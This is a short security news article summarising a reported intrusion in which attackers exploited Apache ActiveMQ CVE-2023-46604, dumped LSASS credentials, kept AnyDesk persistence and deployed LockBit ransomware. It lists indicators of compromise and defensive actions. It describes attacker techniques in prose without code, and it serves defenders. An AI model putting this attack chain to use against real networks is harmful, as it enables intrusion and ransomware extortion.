Attackers Exploit CVE-2023-46604 ActiveMQ RCE for LockBit Ransomware in 19 Days

Home » News
Yash Shield
News
Reading time icon 2 min. read

Calendar icon Published on

Threat actors exploited Apache ActiveMQ CVE-2023-46604 for initial access leading to LockBit deployment. 19-day timeline spanned two intrusions through unpatched beachhead server. Stolen service account credentials enabled rapid domain admin re-entry.

Mid-February 2024 OpenWire command triggered remote Java Spring XML payload. CertUtil downloaded Metasploit stager establishing C2 to 166.62.100.52 within 40 minutes. SYSTEM privileges achieved followed by LSASS credential dumping across four hosts.

Initial detection evicted attackers day two leaving vulnerable ActiveMQ unpatched. 18 days later identical exploit re-entered using stolen service account credentials. Advanced IP Scanner disguised as SoftPerfect enumerated live hosts rapidly.

LockBit executables LB3.exe and LB3_pass.exe deployed via RDP to servers/workstations. File servers executed with path/password arguments; others double-clicked via Explorer. Session app ransom notes indicated Black builder independent operator.

Initial Access (Source – The DFIR Report)

Sysmon captured LSASS GrantedAccess 0x1010 confirming memory dumping. PowerShell payloads used string concatenation, Base64, gzip obfuscation layers. VirtualAlloc/VirtualProtect shellcode evaded signature detection where Defender absent.

AnyDesk installed silently as autostart service maintaining persistence. rdp.bat opened port 3389 then self-deleted after six minutes. Event logs wiped; SystemSettingsAdminFlows.exe disabled Defender on Exchange server.

LSASS Credential Dumping Activity Observed in Sysmon Logs During Round 1 and Round 2 (Source – The DFIR Report)

Attack Timeline Table

DayActionDuration
0CVE-2023-46604 → Metasploit40 minutes
1LSASS dump 4 hostsDay 1
2Eviction (ActiveMQ unpatched)Day 2
20Re-entry → LockBit419 hours total
AnyDesk Silent Installation and C2 Connection to 166.62.100[.]52 (Source – The DFIR Report)

IOCs Table

TypeIndicatorDescription
IP166.62.100.52C2/AnyDesk source
SHA256C8646CFB574FF2C6…LB3_pass.exe
SHA2568CEEE89550C521BA…LB3.exe
SHA25687BFB05057F21565…netscan.exe
AnyDesk ID1148037084Attacker client

419-hour time-to-ransomware exploitable in 90 minutes on return. Single unpatched gateway enabled complete network compromise.

Defensive Actions

  • Patch CVE-2023-46604 immediately
  • Enable Credential Guard LSASS protection
  • Monitor Sysmon 0x1010 GrantedAccess
  • Block unauthorized AnyDesk installs
  • Reset service account credentials
  • Deploy EDR across all endpoints

ActiveMQ represents persistent gateway vulnerability. Service account compromise bridges intrusion attempts indefinitely. LockBit Black proliferation accelerates independent deployments.

FAQ

Initial access vulnerability?

CVE-2023-46604 ActiveMQ RCE.

Total time to ransomware?

419 hours (19+ days).

Persistence mechanism used?

AnyDesk autostart service.

Re-entry credential source?

LSASS dump privileged service account.

Ransom note destination?

Session private messaging app.

Yash

Yash Shield

I am a Business Analytics student with a strong interest in publishing well-researched and data-driven news articles. I focus on analyzing trends in business, finance, and technology to create clear, accurate, and engaging content for readers. I enjoy transforming complex data and information into simple, meaningful stories that help audiences understand current developments. With analytical thinking and attention to detail, I aim to deliver credible and insightful news that adds real value to readers.

Readers help support VPNCentral. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more

User forum

0 messages